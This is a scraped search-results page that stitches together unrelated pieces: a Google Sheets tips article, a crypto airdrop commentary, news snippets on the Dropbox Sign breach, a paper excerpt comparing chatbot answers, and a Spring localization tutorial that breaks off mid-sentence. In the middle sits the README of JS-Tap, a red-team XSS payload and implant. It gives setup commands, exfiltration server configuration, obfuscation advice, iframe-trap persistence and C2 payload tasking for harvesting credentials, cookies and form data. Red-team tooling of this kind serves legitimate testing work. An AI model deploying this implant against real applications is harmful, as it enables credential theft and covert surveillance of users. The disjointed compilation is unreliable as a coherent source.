Search results for Drop Cobalt

It's been a while since my last appearance, but I'm excited to be back and to share something truly special with you. In this article, we'll explore my top 10 Google Sheets features that are guaranteed to boost your productivity, speed up your workflow, and make your data handling more efficient. So, without further ado, let's dive into these game-changing tools! https://youtu.be/iHAvhGO0Df0?si=j6ePVf_Y5814jupV&embedable=true Autofill One of the simplest yet most effective features in Google Sheets is Autofill. Imagine you need to input numbers from 1 to 100—instead of typing each one, simply start the sequence, grab the blue dot at the corner of the cell, and drag down. Google Sheets will fill the rest for you. This works not just with numbers, but with days of the week and months of the year too, saving you a significant amount of time. Removing Whitespace and Duplicates When working with large datasets, cleaning up data is crucial. Google Sheets makes this easy with tools to eliminate unwanted whitespace and duplicates. Just select your range, use the "Trim whitespace" option under Data Cleanup, and voilà—clean, tidy cells. Similarly, the "Remove duplicates" feature ensures that only unique values remain, streamlining your data for better analysis. Alternating Colors Enhancing readability can significantly improve the way you interact with your data. The "Alternating colors" feature applies different colors to alternating rows, making your spreadsheet easier to read and reducing errors when reviewing large blocks of data. Embedding Sheets in Web Pages For those who wish to integrate Google Sheets with their websites, the ability to embed sheets is invaluable. Simply choose to embed your document, copy the provided HTML code, and paste it into your website. This allows you to display live, interactive data directly on your web pages. Data Validation for Dates Data integrity can be maintained by restricting input to certain types of data. For example, you can set a cell to only accept dates. This is done through data validation, where you select "Date" as the criteria, and Google Sheets will provide a handy date picker to ensure accuracy. Importing HTML Need to pull data from a webpage into your spreadsheet? The "ImportHTML" function is your friend. Just write the formula, specify the URL, and choose the table you wish to import. This feature not only saves time but also ensures you can quickly update your spreadsheet with the latest web data. Extracting Unique Values To identify unique entries from a range, the "Unique" function is perfect. It extracts distinct values from your selected range, allowing you to see just the unique information without any repeats. Quick Sheet Creation If you need to create a new spreadsheet quickly, just type "sheets.new" in your Chrome address bar. This shortcut instantly opens a new Google Sheet, helping you get to work right away without navigating through menus. Import Range Sometimes, you might need to share data from a spreadsheet without giving access to the entire file. "Import Range" allows you to import specific ranges from one Google Sheet to another, keeping the data synchronized without manual intervention. Google Translate in Sheets Google Sheets can even translate text directly within cells using the "Google Translate" function. Simply specify the cell, the source language, and the target language, and the translation updates in real-time. Bonus Tip Column Stats For data analysts, the "Column Stats" add-on provides quick statistical insights into data columns without needing to apply complex formulas. This tool is excellent for a high-level overview of data characteristics. Inserting Images in Cells A lesser-known but handy feature is the ability to insert images directly into cells. This functionality allows for a more organized display of visual data, which can be particularly useful for inventory lists, directories, and catalogs. I hope you find these tips helpful for making the most out of Google Sheets. If you enjoyed this article, please consider liking and sharing it. Your feedback is always welcome, so feel free to drop a comment below. Don't forget to subscribe for more useful content, and I look forward to seeing you in future articles! Thank you for your support and happy sheeting!

Sheets Sheets Features

Join the Be.Cyber community! On the program: news and tools monitoring, mutual aid and knowledge sharing, event organization (workshops, CTF resolution), ... And it's all in good fun!

Hi everyone, Daria Strategy here 🙌🏻 I'm a Growth Marketer, Brand Strategist and Communications expert working with blockchain and crypto projects. I create additional value and build brand awareness of the Web3 companies among users, developers, and VC funds. Recently, the crypto market exploded with news about the airdrop of EigenLayer, the most hyped Ethereum restaking platform. The conditions for receiving this drop caused an even greater explosion of emotions, discussions, and even hate. The project offers a platform for those who want to restake rather than the classic staking process that attracts regulators' attention. The emergence of EigenLayer and LRT restaking protocols increased ETH's share of staking to 26% of the total supply. According to DeFi Lama, EigenLayer is TVL's second-largest protocol on Ethereum after Lido, at .2 billion: An airdrop from EigenLayer canonically illustrates community expectations and market conditions. In this article, I explain what happened and what problems this case highlights in the crypto market. I also took a comment from my colleague, a product marketer who is now introducing a similar product to the market. Let's figure it out together! A short overview of the Eigen Layer Airdrop Over the last year, EigenLayer has become super popular because of the rethinking of Ethereum restaking and the big names of venture funds that have invested in this project (a16z crypto, Ethereal Ventures, Polychain Capital, Coinbase Ventures, etc.). The journalists of Blockworks recommend calling the EIGEN token generation event a “stake drop,” not “an airdrop. “ EIGEN can only be staked with EigenLabs' proof-of-concept/proof-of-value data availability service EigenDA, at least in the beginning, until other apps building with EigenLayer integrate the token into their own platforms. According to tokenomics, 45% of the 1.67 billion coins will go to the community, and a third will go to the airdrop for staking participants. The main complaint is related to the terms of holding the coins—after the $EIGEN stamp, they cannot be moved, and the monthly split will be only 5%. The platform team decided not to allow users from the USA, Canada, India, China, and several other countries to distribute and also warned about blocking for using VPN services. There were no geoblocks for restaking Ethereum before, so this situation angered many users who held their ETH in EigenLayer. The negative reaction to the actions of the project team caused a surge in asset withdrawals from the restaking service. According to Dune, more than 7,000 withdrawal requests were initiated. Here is a funny but apt video based on a famous meme I found on Twitter. In general, it describes pretty well the situation around the airdrop and the reasons for the disappointment of the community. The link to the post with this video is here. n What does this EigenLayer Airdrop show us? The EigenLayer case highlights several important points and issues that we could observe that have been in the market for a long time and which all participants try to ignore. 1️⃣ The successful Aptos airdrop in late 2022 ushered in the "fat retrodrops" era and raised farmer expectations. People imitate activities in the networks, hoping to wake up one morning and see Lambo from the window. @RyanSAdams from Bankless described this point very well: n 2️⃣ Many projects started betting on the token and using it as a marketing and reputation tool. I talked to the founders, convinced that only a drop would help them draw attention to the project. This is naive and short-sighted. Paying users for using the product is unnatural because instead of healthy competition and customer loyalty, it creates greed and a "gold rush.” 3️⃣ The market does not have sufficient users. Projects encourage activity by hinting at rewards for those who will boost the activity. However, it is obvious that projects can but are not obliged to pay rewards to users for their activity on the network. This sends only one message to the average crypto user: **Your active participation, in the end, can mean very little. n 4️⃣ In the world beyond Web3, businesses compete with each other through better technology, more attractive design, clear communication, and other factors that affect market position. Traditional businesses offer cashback and discounts at the product's launch, but no one pays tens of thousands of people 00+ for using shampoo or buying a car. n n 5️⃣ Blockchain projects desperately need users interested in technologies, not drops! This need highlights the significant issues with UX and product value communication. It must be a user-oriented approach with a consistent product and marketing vision. Some Web3 founders started to take this point, but not the majority. The desire to make more complex technological products to show them off in front of fellow technicians takes precedence over a rational approach and customer orientation. What's the future of restaking in the context of the EigenLayer case? I asked Denis Igin, the Product Marketer at Nektar, about the case of EigenLayer's airdrop. Nektar is a multilayered restaking network implementing a comprehensive incentives system for its participants, so Denis is well-versed with the current state of the restaking market and able to share his vision on this issue. - What will be further after such a disappointment of the community? Will we see the withdrawal of funds from the restaking platforms? Denis: It's hard to say about EigenLayer, but restaking as a concept and approach changes everything. For example, it enables the composability of solutions sourcing trust from the same set of validators, leading to technological advances such as native interoperability, etc. After mercenary capital outflow, next comes proving economics that everyone expects from the original design: additional rewards for restakers. Demand from AVSs might not be high at first, as with everything novel, but eventually, repurposing Ethereum security will have a disruptive and long-lasting impact comparable to decoupling execution by rollups. - Is the drop a panacea for product promotion? Denis: When used wisely, airdrops are a great way to gather relevant community information about the project. Gamification works too, e.g. Nektar recently launched a points system. - What conclusions did you draw following the case of the EigenLayer airdrop? Denis: The main lesson is that larger projects may fail in many ways, and this is likely due to the experimental nature of the restaking technology. As a community, we should not repeat the mistake of creating an outsized stakeholder leader. There's room for more restaking players, and Nektar looks like a viable alternative to EL due to its integrated DVT, providing better resiliency and decentralization. Conclusion Many people support this situation with airdrops because it brings (actually, not always) high income in a short-term perspective. Another issue is that high-tech projects are not ready to be more open to a broader audience; they only create technologies for developers, limiting the market's growth. I can't imagine the industry's organic growth if the blockchain/crypto projects start fighting over who will give away more crypto in fear that their activity on the network or the number of followers will fall due to inflated expectations. I urge all members of the Web3 industry pay more attention to the value of the project and build a long-term relationships between the product and the users. The hype passes quickly, and what remains in return, loyalty or disappointment, depends on the ability of the founders to play the long game. Read my previous articles about making blockchain as popular as AI and launching a Web3 Project in 2024. Follow me on social media: LinkedIn, X, and YouTube.

Airdrop EigenLayer EigenLayer Airdrop

JavaScript payload and supporting software to be used as XSS payload or post exploitation implant to monitor users as they use the targeted application. Also includes a C2 for executing custom JavaScript payloads in clients. Changelogs Major changes are documented in the project Announcements: https://github.com/hoodoer/JS-Tap/discussions/categories/announcements Demo You can read the original blog post about JS-Tap here: javascript-for-red-teams">https://trustedsec.com/blog/js-tap-weaponizing-javascript-for-red-teams Short demo from ShmooCon of JS-Tap version 1: https://youtu.be/IDLMMiqV6ss?si=XunvnVarqSIjx_x0&t=19814 Demo of JS-Tap version 2 at HackSpaceCon, including C2 and how to use it as a post exploitation implant: https://youtu.be/aWvNLJnqObQ?t=11719 A demo can also be seen in this webinar: https://youtu.be/-c3b5debhME?si=CtJRqpklov2xv7Um Upgrade warning I do not plan on creating migration scripts for the database, and version number bumps often involve database schema changes (check the changelogs). You should probably delete your jsTap.db database on version bumps. If you have custom payloads in your JS-Tap server, make sure you export them before the upgrade. Introduction JS-Tap is a generic JavaScript payload and supporting software to help red teamers attack webapps. The JS-Tap payload can be used as an XSS payload or as a post exploitation implant. The payload does not require the targeted user running the payload to be authenticated to the application being attacked, and it does not require any prior knowledge of the application beyond finding a way to get the JavaScript into the application. Instead of attacking the application server itself, JS-Tap focuses on the client-side of the application and heavily instruments the client-side code. The example JS-Tap payload is contained in the telemlib.js file in the payloads directory, however any file in this directory is served unauthenticated. Copy the telemlib.js file to whatever filename you wish and modify the configuration as needed. This file has not been obfuscated. Prior to using in an engagement strongly consider changing the naming of endpoints, stripping comments, and highly obfuscating the payload. Make sure you review the configuration section below carefully before using on a publicly exposed server. Data Collected Client IP address, OS, Browser User inputs (credentials, etc.) URLs visited Cookies (that don't have httponly flag set) Local Storage Session Storage HTML code of pages visited (if feature enabled) Screenshots of pages visited Copy of Form Submissions Copy of XHR API calls (if monkeypatch feature enabled) Endpoint Method (GET, POST, etc.) Headers set Request body and response body Copy of Fetch API calls (if monkeypatch feature enabled) Endpoint Method (GET, POST, etc.) Headers set Request body and response body Note: ability to receive copies of XHR and Fetch API calls works in trap mode. In implant mode only Fetch API can be copied currently. Operating Modes The payload has two modes of operation. Whether the mode is trap or implant is set in the initGlobals() function, search for the window.taperMode variable. Trap Mode Trap mode is typically the mode you would use as a XSS payload. Execution of XSS payloads is often fleeting, the user viewing the page where the malicious JavaScript payload runs may close the browser tab (the page isn't interesting) or navigate elsewhere in the application. In both cases, the payload will be deleted from memory and stop working. JS-Tap needs to run a long time or you won't collect useful data. Trap mode combats this by establishing persistence using an iFrame trap technique. The JS-Tap payload will create a full page iFrame, and start the user elsewhere in the application. This starting page must be configured ahead of time. In the initGlobals() function search for the window.taperstartingPage variable and set it to an appropriate starting location in the target application. In trap mode JS-Tap monitors the location of the user in the iframe trap and it spoofs the address bar of the browser to match the location of the iframe. Note that the application targeted must allow iFraming from same-origin or self if it's setting CSP or X-Frame-Options headers. JavaScript based framebusters can also prevent iFrame traps from working. Note, I've had good luck using Trap Mode for a post exploitation implant in very specific locations of an application, or when I'm not sure what resources the application is using inside the authenticated section of the application. You can put an implant in the login page, with trap mode and the trap mode start page set to window.location.href (i.e. current location). The trap will set when the user visits the login page, and they'll hopefully contine into the authenticated portions of the application inside the iframe trap. A user refreshing the page will generally break/escape the iframe trap. Implant Mode Implant mode would typically be used if you're directly adding the payload into the targeted application. Perhaps you have a shell on the server that hosts the JavaScript files for the application. Add the payload to a JavaScript file that's used throughout the application (jQuery, main.js, etc.). Which file would be ideal really depends on the app in question and how it's using JavaScript files. Implant mode does not require a starting page to be configured, and does not use the iFrame trap technique. A user refreshing the page in implant mode will generally continue to run the JS-Tap payload. Installation and Start Requires python3. A large number of dependencies are required for the jsTapServer, you are highly encouraged to use python virtual environments to isolate the libraries for the server software (or whatever your preferred isolation method is). Example: mkdir jsTapEnvironmentpython3 -m venv jsTapEnvironmentsource jsTapEnvironment/bin/activatecd jsTapEnvironmentgit clone https://github.com/hoodoer/JS-Tapcd JS-Tappip3 install -r requirements.txtrun in debug/single thread mode:python3 jsTapServer.pyrun with gunicorn multithreaded (production use):./jstapRun.sh A new admin password is generated on startup. If you didn't catch it in the startup print statements you can find the credentials saved to the adminCreds.txt file. If an existing database is found by jsTapServer on startup it will ask you if you want to keep existing clients in the database or drop those tables to start fresh. Note that on Mac I also had to install libmagic outside of python. brew install libmagic Playing with JS-Tap locally is fine, but to use in a proper engagment you'll need to be running JS-Tap on publicly accessible VPS and setup JS-Tap with PROXYMODE set to True. Use NGINX on the front end to handle a valid certificate. Configuration JS-Tap Server Configuration Debug/Single thread config If you're running JS-Tap with the jsTapServer.py script in single threaded mode (great for testing/demos) there are configuration options directly in the jsTapServer.py script. Proxy Mode For production use JS-Tap should be hosted on a publicly available server with a proper SSL certificate from someone like letsencrypt. The easiest way to deploy this is to allow NGINX to act as a front-end to JS-Tap and handle the letsencrypt cert, and then forward the decrypted traffic to JS-Tap as HTTP traffic locally (i.e. NGINX and JS-Tap run on the same VPS). If you set proxyMode to true, JS-Tap server will run in HTTP mode, and take the client IP address from the X-Forwarded-For header, which NGINX needs to be configured to set. When proxyMode is set to false, JS-Tap will run with a self-signed certificate, which is useful for testing. The client IP will be taken from the source IP of the client. Data Directory The dataDirectory parameter tells JS-Tap where the directory is to use for the SQLite database and loot directory. Not all "loot" is stored in the database, screenshots and scraped HTML files in particular are not. Server Port To change the server port configuration see the last line of jsTapServer.py app.run(debug=False, host='0.0.0.0', port=8444, ssl_context='adhoc') Gunicorn Production Configuration Gunicorn is the preferred means of running JS-Tap in production. The same settings mentioned above can be set in the jstapRun.sh bash script. Values set in the startup script take precedence over the values set directly in the jsTapServer.py script when JS-Tap is started with the gunicorn startup script. A big difference in configuration when using Gunicorn for serving the application is that you need to configure the number of workers (heavy weight processes) and threads (lightweight serving processes). JS-Tap is a very I/O heavy application, so using threads in addition to workers is beneficial in scaling up the application on multi-processor machines. Note that if you're using NGINX on the same box you need to configure NGNIX to also use multiple processes so you don't bottleneck on the proxy itself. At the top of the jstapRun.sh script are the numWorkers and numThreads parameters. I like to use number of CPUs + 1 for workers, and 4-8 threads depending on how beefy the processors are. For NGINX in its configuration I typically set worker_processes auto; Proxy Mode is set by the PROXYMODE variable, and the data directory with the DATADIRECTORY variable. Note the data directory variable needs a trailing '/' added. Using the gunicorn startup script will use a self-signed cert when started with PROXYMODE set to False. You need to generate that self-signed cert first with: openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes telemlib.js Configuration These configuration variables are in the initGlobals() function. JS-Tap Server Location You need to configure the payload with the URL of the JS-Tap server it will connect back to. window.taperexfilServer = "https://127.0.0.1:8444"; Mode Set to either trap or implant This is set with the variable: window.taperMode = "trap";orwindow.taperMode = "implant"; Trap Mode Starting Page Only needed for trap mode. See explanation in Operating Modes section above. Sets the page the user starts on when the iFrame trap is set. window.taperstartingPage = "http://targetapp.com/somestartpage"; If you want the trap to start on the current page, instead of redirecting the user to a different page in the iframe trap, you can use: window.taperstartingPage = window.location.href; Client Tag Useful if you're using JS-Tap against multiple applications or deployments at once and want a visual indicator of what payload was loaded. Remember that the entire /payloads directory is served, you can have multiple JS-Tap payloads configured with different modes, start pages, and clien tags. This tag string (keep it short!) is prepended to the client nickname in the JS-Tap portal. Setup multiple payloads, each with the appropriate configuration for the application its being used against, and add a tag indicating which app the client is running. window.taperTag = 'whatever'; Custom Payload Tasks Used to set if clients are checking for Custom Payload tasks, and how often they're checking. The jitter settings Let you optionally set a floor and ceiling modifier. A random value between these two numbers will be picked and added to the check delay. Set these to 0 and 0 for no jitter. window.taperTaskCheck = true;window.taperTaskCheckDelay = 5000;window.taperTaskJitterBottom = -2000;window.taperTaskJitterTop = 2000; Exfiltrate HTML true/false setting on whether a copy of the HTML code of each page viewed is exfiltrated. window.taperexfilHTML = true; Copy Form Submissions true/false setting on whether to intercept a copy of all form posts. window.taperexfilFormSubmissions = true; MonkeyPatch APIs Enable monkeypatching of XHR and Fetch APIs. This works in trap mode. In implant mode, only Fetch APIs are monkeypatched. Monkeypatching allows JavaScript to be rewritten at runtime. Enabling this feature will re-write the XHR and Fetch networking APIs used by JavaScript code in order to tap the contents of those network calls. Not that jQuery based network calls will be captured in the XHR API, which jQuery uses under the hood for network calls. window.monkeyPatchAPIs = true; Screenshot after API calls By default JS-Tap will capture a new screenshot after the user navigates to a new page. Some applications do not change their path when new data is loaded, which would cause missed screenshots. JS-Tap can be configured to capture a new screenshot after an XHR or Fetch API call is made. These API calls are often used to retrieve new data to display. Two settings are offered, one to enable the "after API call screenshot", and a delay in milliseconds. X milliseconds after the API call JS-Tap will capture the new screenshot. window.postApiCallScreenshot = true;window.screenshotDelay = 1000; JS-Tap Portal Login with the admin credentials provided by the server script on startup. Clients show up on the left, selecting one will show a time series of their events (loot) on the right. The clients list can be sorted by time (first seen, last update received) and the list can be filtered to only show the "starred" clients. There is also a quick filter search above the clients list that allows you to quickly filter clients that have the entered string. Useful if you set an optional tag in the payload configuration. Optional tags show up prepended to the client nickname. Each client has an 'x' button (near the star button). This allows you to delete the session for that client, if they're sending junk or useless data, you can prevent that client from submitting future data. When the JS-Tap payload starts, it retrieves a session from the JS-Tap server. If you want to stop all new client sessions from being issues, select Session Settings at the top and you can disable new client sessions. You can also block specific IP addresses from receiving a session in here. Each client has a "notes" feature. If you find juicy information for that particular client (credentials, API tokens, etc) you can add it to the client notes. After you've reviewed all your clients and made you notes, the View All Notes feature at the top allows you to export all notes from all clients at once. The events list can be filtered by event type if you're trying to focus on something specific, like screenshots. Note that the events/loot list does not automatically update (the clients list does). If you want to load the latest events for the client you need to select the client again on the left. Custom Payloads Starting in version 1.02 there is a custom payload feature. Multiple JavaScript payloads can be added in the JS-Tap portal and executed on a single client, all current clients, or set to autorun on all future clients. Payloads can be written/edited within the JS-Tap portal, or imported from a file. Payloads can also be exported. The format for importing payloads is simple JSON. The JavaScript code and description are simply base64 encoded. [{"code":"YWxlcnQoJ1BheWxvYWQgMSBmaXJpbmcnKTs=","description":"VGhlIGZpcnN0IHBheWxvYWQ=","name":"Payload 1"},{"code":"YWxlcnQoJ1BheWxvYWQgMiBmaXJpbmcnKTs=","description":"VGhlIHNlY29uZCBwYXlsb2Fk","name":"Payload 2"}] The main user interface for custom payloads is from the top menu bar. Select Custom Payloads to open the interface. Any existing payloads will be shown in a list on the left. The button bar allows you to import and export the list. Payloads can be edited on the right side. To load an existing payload for editing select the payload by clicking on it in the Saved Payloads list. Once you have payloads defined and saved, you can execute them on clients. In the main Custom Payloads view you can launch a payload against all current clients (the Run Payload button). You can also toggle on the Autorun attribute of a payload, which means that all new clients will run the payload. Note that existing clients will not run a payload based on the Autorun setting. You can toggle on Repeat Payload and the payload will be tasked for each client when they check for tasks. Remember, the rate that a client checks for custom payload tasks is variable, and that rate can be changed in the main JS-Tap payload configuration. That rate can be changed with a custom payload (calling the updateTaskCheckInterval(newDelay) function). The jitter in the task check delay can be set with the updateTaskCheckJitter(newTop, newBottom) function. The Clear All Jobs button in the custom payload UI will delete all custom payload jobs from the queue for all clients and resets the auto/repeat run toggles. To run a payload on a single client user the Run Payload button on the specific client you wish to run it on, and then hit the run button for the specific payload you wish to use. You can also set Repeat Payload on individual clients. Tools A few tools are included in the tools subdirectory. clientSimulator.py A script to stress test the jsTapServer. Good for determining roughly how many clients your server can handle. Note that running the clientSimulator script is probably more resource intensive than the actual jsTapServer, so you may wish to run it on a separate machine. At the top of the script is a numClients variable, set to how many clients you want to simulator. The script will spawn a thread for each, retrieve a client session, and send data in simulating a client. numClients = 50 You'll also need to configure where you're running the jsTapServer for the clientSimulator to connect to: apiServer = "https://127.0.0.1:8444" JS-Tap run using gunicorn scales quite well. MonkeyPatchApp A simple app used for testing XHR/Fetch monkeypatching, but can give you a simple app to test the payload against in general. Run with: python3 monkeyPatchLab.py By default this will start the application running on: https://127.0.0.1:8443 Pressing the "Inject JS-Tap payload" button will run the JS-Tap payload. This works for either implant or trap mode. You may need to point the monkeyPatchLab application at a new JS-Tap server location for loading the payload file, you can find this set in the injectPayload() function in main.js function injectPayload(){ document.head.appendChild(Object.assign(document.createElement('script'), {src:'https://127.0.0.1:8444/lib/telemlib.js',type:'text/javascript'}));} formParser.py Abandoned tool, is a good start on analyzing HTML for forms and parsing out their parameters. Intended to help automatically generate JavaScript payloads to target form posts. You should be able to run it on exfiltrated HTML files. Again, this is currently abandonware. generateIntelReport.py No longer working, used before the web UI for JS-Tap. The generateIntelReport script would comb through the gathered loot and generate a PDF report. Saving all the loot to disk is now disabled for performance reasons, most of it is stored in the datagbase with the exception of exfiltratred HTML code and screenshots. Contact @hoodoer hoodoer@bitwisemunitions.devDownload JS-Tap

JS-Tap JS-Tap payload trap mode

After a breach in the Dropbox Sign environment, customer information may have been stolen and API users have restricted functionality

Sign customer Sign environment

Threat actors breached the Dropbox Sign production environment and accessed customer email addresses and hashed passwords Cloud storage provider DropBox revealed that threat actors have breached the production infrastructure of the DropBox Sign eSignature service and gained access to customer information and authentication data. Dropbox Sign is a service that allows users to electronically sign […]

passwords Cloud Sign production

Bitcoin is dropping in value again, now at ,000. USD, backed by USG, has figured how to milk BTC of its gains. BTC investors are getting arrested left, right and centre; Samourai Wallet founders were arrested on money laundering charges, CZ Binance will be in jail for four months and Bitcoin Jesus got nabbed for BTC tax evasion. USD will be milking BTC for a long time to come.

Bitcoin Jesus Milking BTC Time Bitcoin

Dropbox disclosed a significant security breach affecting its electronic signature service, Dropbox Sign (formerly known as HelloSign). The incident, which came to light on April 24, involved unauthorized access to the Dropbox Sign production environment, exposing sensitive customer information. Dropbox’s security team was alerted to the breach on April 24 after detecting unauthorized access to […] The post Dropbox Sign Hacked: Attackers Stolen API Keys, MFA, & Hashed Passwords appeared first on Cyber Security News.

Dropbox Sign Sign Hacked Stolen API

Cloud storage firm DropBox says hackers breached production systems for its DropBox Sign eSignature platform and gained access to authentication tokens, MFA keys, hashed passwords, and customer information. [...]

service Cloud Sign eSignature

:::info Authors: (1) Renato P. dos Santos, CIAGE – Centre for Generative Artificial Intelligence in Cognition and Education. ::: Table of Links Abstract and Introduction Materials And Methods Results and Analyses Prompts and generated texts Conceptualizing chemical reactions Deepening on understanding of chemical reactions Question about combustion Question about a graph of gases turning into water over time Question about the difference between atoms, molecules, and moles Deepening on the concept of mole Question about changing of state Question about an animated representation of water molecules undergoing phase changes Question about plasma, a state of matter Question about chemical bondings Question about illustration of chemical bonds Question about the essence of the type of chemical bonding Further analysis Conclusions Limitations of the study and possible future studies Author Contributions, Conflicts of interest, Acknowledgements, and References Question about an animated representation of water molecules undergoing phase changes P1*: hmmm. you made a nice graph before. Could you build something more dynamic than a static diagram, an animated representation of water molecules undergoing phase changes?* ChatGPT*: Got it! Creating an animated representation of water molecules undergoing phase changes requires defining the behavior of the molecules for each phase and then transitioning between these phases.* I'll follow these steps: 1. Represent the molecules as small circles. 2. Define their behavior in the solid phase. 3. Transition to the melting phase. 4. Define behavior in the liquid phase. 5. Transition to the boiling phase. 6. Define behavior in the gas phase. 7. Compile these animations into a continuous GIF. [Some internal code working] Here's the animated representation of water molecules undergoing phase changes: Here's the animated representation of water molecules undergoing phase changes: 1. Solid (Ice): Molecules are closely packed and vibrating in place. 2. Melting: Molecules start to move more freely but remain close. 3. Liquid (Water): Molecules move more fluidly and slide past each other. 4. Boiling: Molecules gain energy and move more rapidly. 5. Gas (Steam): Molecules spread out and move freely and rapidly. You can download the GIF here. [link provided] BingChat*: Sure, I can try to create an animated representation of water molecules undergoing phase changes. I found some web simulations that show how different types of molecules form a solid, liquid, or gas, and how they change their state when heat is added or removed [123]. Youcan also change the temperature or volume of a container and see a pressure-temperature diagram respond in real time [1]. These simulations might help you understand the molecular behavior of water in different phases.* Bard*: Sure. Here is a simple animated representation of water molecules undergoing phase changes:* [Animated GIF of water molecules undergoing phase changes] The animation shows two groups of water molecules. The group on the left is in the liquid phase, and the group on the right is in the gas phase. The animation starts with the water molecules in the liquid phase. The water molecules are close together and interacting with each other. As the animation progresses, some of the water molecules in the liquid phase gain enough energy to overcome the forces that are holding them together. These water molecules escape from the liquid phase and form the gas phase. The water molecules in the gas phase are far apart and not interacting with each other. The animation also shows how water molecules can condense from the gas phase to the liquid phase. When a water molecule in the gas phase loses energy, it can attract to other water molecules and form a liquid droplet. The animation can be used to illustrate the different phase changes of water, such as melting, boiling, evaporation, and condensation. I hope this is helpful! Claude*: Sure, animated visualizations can be really helpful for understanding dynamic processes like phase changes! Here is a simple animated illustration showing water molecules in different states:* In this animation: • The solid ice molecules are stationary and packed together • The liquid molecules flow and move closer together • The gas molecules bounce around freely at large distances To transition between states: • Heating causes more vigorous movement - melting ice or boiling water • Cooling causes slower movement - freezing water or condensing vapor Let me know if an animated illustration like this helps visualize the molecular differences between solids, liquids and gases! I can build more complex animations or use online tools to create interactive phase change simulations. Visuals can really aid understanding of physical chemistry concepts. ChatGPT was able to recur again to its Advanced Data Analysis resources to generate an animated GIF as an Instructional Strategies, which, albeit a bit simple and crude, sufficiently illustrated the “water molecules undergoing phase changes” to provide Engagement & Interactivity. Furthermore, crafting an original GIF could be seen as Personalization & Personable Touch. After promising “to create an animated representation”, BingChat opted to search the internet, offering links to “some web simulations” that “might help” understand the molecular behavior. This approach aligns with Instructional Strategies and Detail Depth & Content Recommendation. However, by leaning on pre-existing resources rather than crafting custom content, it could lessen the immediate Engagement & Interactivity and potentially diminish the Personalization & Personable Touch. Bard made an assurance to deliver “a simple animated representation” as a commitment to Instructional Strategies, Personalization & Personable Touch and Engagement & Interactivity, but this ultimately falls short as neither a visible animation nor a download link for such a GIF was provided. Meanwhile, while Claude acknowledges that “Visuals can really aid understanding” and “animated visualizations can be really helpful” as Instructional Strategies, its attempt was limited to the of a static image, devoid of the requested animation or dynamic representation and lessening Engagement & Interactivity and Detail Depth & Content Recommendation. :::info This paper is available on arxiv under CC BY-SA 4.0 DEED license. :::

Molecules Molecules Undergoing Phase Undergoing Phase Water Molecules

Whether you are thinking of localizing your project or just learning how to do that, AI might be a good start. It offers a cost-efficient entry point for experiments and automation. In this post, we will walk through one such experiment. We will: choose an open-source application review and implement the prerequisites automate the translation stage using AI If you've never dealt with localization and would like to learn, it might be a good idea to start here. Except for a few technical details, the approach is largely universal, and you can apply it to other types of projects. If you're already familiar with the basics and just want to see AI in action, you might want to skip to Translate texts or clone my fork to skim over the commits and evaluate the results. Get the Project Creating an application just for a localization experiment would be overkill, so let's fork some open-source projects. I chose Spring Petclinic, an example web app that is used to showcase the Spring framework for Java. Fork and clone Petclinic (requires GitHub CLI): gh repo fork https://github.com/spring-projects/spring-petclinic --clone=true If you haven't used Spring before, some code snippets might not look familiar to you, but, as I already mentioned, this discussion is technology-agnostic. The steps are roughly the same regardless of the language and framework. Localization Prerequisites Before an application can be localized, it has to be internationalized. Internationalization (also spelled i18n) is the process of adapting software to support different languages. It usually begins with externalizing the UI strings to special files, commonly referred to as resource bundles. Resource bundles hold the text values for different languages: en.json: { "greeting": "Hello!", "farewell": "Goodbye!" } es.json: { "greeting": "¡Hola!", "farewell": "¡Adiós!" } For these values to make their way to the UI, the UI must be explicitly programmed to use these files. This typically involves an internationalization library or a built-in language feature whose purpose is to replace UI texts with the correct values for a given locale. Examples of such libraries include i18next (JavaScript), Babel (Python), and go-i18n (Go). Java supports internationalization out-of-the-box, so we don't need to bring additional dependencies into the project. Examine the Sources Java uses files with the .properties extension to store localized strings for the user interface. Luckily, there are already a bunch of them in the project. For instance, here's what we have for English and Spanish: messages.properties: welcome=Welcome required=is required notFound=has not been found duplicate=is already in use nonNumeric=must be all numeric duplicateFormSubmission=Duplicate form submission is not allowed typeMismatch.date=invalid date typeMismatch.birthDate=invalid date messages_es.properties: welcome=Bienvenido required=Es requerido notFound=No ha sido encontrado duplicate=Ya se encuentra en uso nonNumeric=Sólo debe contener numeros duplicateFormSubmission=No se permite el envío de formularios duplicados typeMismatch.date=Fecha invalida typeMismatch.birthDate=Fecha invalida Externalizing UI strings is not something all projects universally do. Some projects may have these texts directly hard-coded into the application logic. Tip: Externalizing UI texts is a good practice with advantages beyond internationalization. It makes the code easier to maintain and promotes consistency in UI messages. If you are starting a project, consider implementing i18n as early as possible. Test Run Let's add a way to change the locale through URL parameters. This will allow us to test if everything is fully externalized and translated to at least one language. To achieve this, we add the following class to manage the locale parameter: WebConfig.java: import java.util.Locale; @Configuration public class WebConfig implements WebMvcConfigurer { @Bean public LocaleResolver localeResolver() { SessionLocaleResolver slr = new SessionLocaleResolver(); slr.setDefaultLocale(Locale.US); return slr; } @Bean public LocaleChangeInterceptor localeChangeInterceptor() { LocaleChangeInterceptor lci = new LocaleChangeInterceptor(); lci.setParamName("lang"); return lci; } @Override public void addInterceptors(InterceptorRegistry registry) { registry.addInterceptor(localeChangeInterceptor()); } } Now that we can test different locales, we run the server and compare the home page for several locale parameters: http://localhost:8080 – default locale http://localhost:8080/?lang=es – Spanish http://localhost:8080/?lang=ko – Korean Changing the locale is reflected in the UI, which is good news. It appears, however, that changing the locale has only affected a portion of the texts. For Spanish, Welcome has changed to Bienvenido, but the links in the header remained the same, and the other pages are still in English. This means we have some work to do. Prepare for Localization The Petclinic project generates pages using Thymeleaf templates, so let's inspect the template files. Indeed, some of the texts are hard-coded, so we need to modify the code to refer to the resource bundles instead. Luckily, Thymeleaf has good support for Java .properties files so that we can incorporate references to the corresponding resource bundle keys right in the template. Before (findOwners.html): <h2>Find Owners</h2> After (findOwners.html): <h2 th:text='#{heading.find.owners}'>Find Owners</h2> (messages.properties): heading.find.owners=Find Owners The previously hard-coded text is still there, but now it serves as a fallback value, which will only be used if there is an error retrieving a proper localized message. The rest of the texts are externalized in a similar manner; however, there are several places that require special attention. For example, some of the warnings come from the validation engine and have to be specified using Java annotation parameters: Before (Person.java): @Column(name = "first_name") @NotBlank private String firstName; After (Person.java): @Column(name = "first_name") @NotBlank(message = "{field.validation.notblank}") private String firstName; In a couple of places, the logic has to be changed: createOrUpdatePetForm.html: <h2> <th:block th:if="${pet['new']}">New </th:block>Pet </h2> In the example above, the template uses a condition. If the new attribute is present, New is added to the UI text. Consequently, 